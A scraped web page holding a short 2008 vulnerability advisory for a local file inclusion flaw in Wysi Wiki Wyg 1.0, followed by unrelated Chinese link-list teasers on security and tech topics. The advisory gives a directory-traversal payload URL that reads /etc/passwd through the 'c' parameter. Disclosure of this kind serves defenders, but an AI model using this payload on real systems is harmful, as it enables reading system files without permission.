Wysi Wiki Wyg 1.0 (index.php c) Local File Inclusion Vulnerability

--== ========================================================= ==-- --== Wizi Wiki Wig Local File Inclusion Vulnerability ==-- --== ========================================================= ==-- [*] Discovered By: StAkeR ~ StAkeR@

--== ========================================================= ==--
--== Wizi Wiki Wig Local File Inclusion Vulnerability ==--
--== ========================================================= ==--
[*] Discovered By: StAkeR ~ [email protected]
[*] Discovered On: 10 Jul 2008
[*] Script Download: http://www.easy-script.com/scripts-dl/wysiwikiwyg10.zip

[*] Vulnerability:
[*] http://site.com/index.php?c=../../../../../../etc/passwd\0
更多相关文章
  • hello cnblogs
  • author: ring04hteam:http://www.80vul.com 由于Discuz!的adminstyles.inc.php里preg_match正则判断$newcvar变量操作不够严谨,导致执行代码漏洞. 一 分析 在文件adminstyles.inc.php里代码:  if($n ...
  • 百度再次启动了原创保护计划,并对原创文章在搜索结果页进行原创标识,这个举动确实引起站长圈很多讨论,欢呼的也有,质疑的也有,反对的也有 最近发现百度大规模的调整,很多网站都被降了权,因为百度再次启动了原创保护计划,并对原创文章在搜索结果页进行原创标识,这个举动确实引起站长圈很多讨论,欢呼的也有,质疑的 ...
  •   如果你认为苹果Mac比Windows系统更安全,请三思.研究人员已经证明了:这不是真的. Mac不再“百毒不侵” 两名研究人员开发出第一个可感染Mac的固件蠕虫病毒,并且可以在无需联网的情况下在MacBook间进行自动传播. 该病毒被称为“Thunderstrike 2”,是年初“Thunder ...
  • 文/刘学文Design by Apple in California Assembled in China,使用过苹果设备的不会对这句话有陌生感.在苹果产业链中,苹果本身不直接制造和组装旗下产品,而是交由代工厂去做,承担着最终组装任务的,就包括台湾大厂富士康.很大程度上讲,富士康和苹果是相互成就的关 ...
  • 最近几天有点忙,所以我们今天来一篇短的,简单地介绍一下数据库设计中的一种模式——Soft Delete. 可以说,该模式毁誉参半,甚至有非常多的人认为该模式是一个Anti-Pattern.因此在本篇文章中,我们不仅仅会对该模式进行介绍,同时也会列出该模式可能导致的一系列问题,以帮助大家正确地决定是否 ...
一周排行
  • 艾玛, 搞得我好累 .. .. Cacti官方提供的模板 sh脚本执行有问题,找不到原因,重新写了脚本就正常... 先看看效果图 (大半夜搞出来的 ,,,) 环境:CentOS 6.5 Bind版本:Bind 9.8 ...
  • 核心提示:人肉搜索,大家都很熟悉了,在黑客业界里,这个应该叫"社会工程学",就是根据一些有限的资料和一般人的心理特征,来进行密码猜测等.我堂哥跟朋友5月底在拍拍买天文望远镜时,由于不知道交易规则, ...
  • 数据库连接URL大全(by quqi99) 作者:张华 发表于:0 版权声明:可以任意转载,转载时请务必以超链接形式标明文章原始出处和作者信息及本版权声明. http://blog.csdn.net ...
  • 易网科技讯 11月4日消息,中国电信在移动支付领域的布局再进一步.11月4日,中国电信翼支付与银联商务.通联支付.杉德银卡通等三家国内线下POS收单企业签署战略合作协议. 根据协议,中国电信负责翼支付用户发展,丰富线 ...
  • package cc.testservice3; import android.os.Bundle; import android.app.Activity; import android.content.Inten ...
  • 光盘1 -学习方法与课程体系介绍(学前必看) -学习方法介绍.avi -国嵌嵌入式课程体系.pdf -嵌入式Linux学习方法.pdf -国嵌课程1-嵌入式入门体验班(上) -第1天(嵌入式系统概述) -国嵌体验入门 ...
  • --由于API效率问题,改用插接口表,运行标准请求的方式创建或者更新物料信息 DECLARE l_iface_rec inv.mtl_system_items_interface%ROWTYPE; l_user_id ...
  •  linux有自己一套完整的启动体系,抓住了linux启动的脉络,linux的启动过程将不再神秘.本文中假设inittab中设置的init tree为:/etc/rc.d/rc0.d/etc/rc.d/rc1.d/e ...
  • 对python新手而言,要理解闭包.装饰器,就要先懂下面这些东东! 先来看下一个函数接受另外一个函数以及一个数字当作参数,并且重复调用指定函数指定次数 cat test.py def hello(): # hello ...
  • 当地时间3月30日,乌克兰敖德萨(Odessa),人们牵起蓝黄两色的长布条"拼"成巨型"国旗",参加一场反对克里米亚加入俄罗斯的集会.   视频:乌克兰准备重新加强军备建设   ...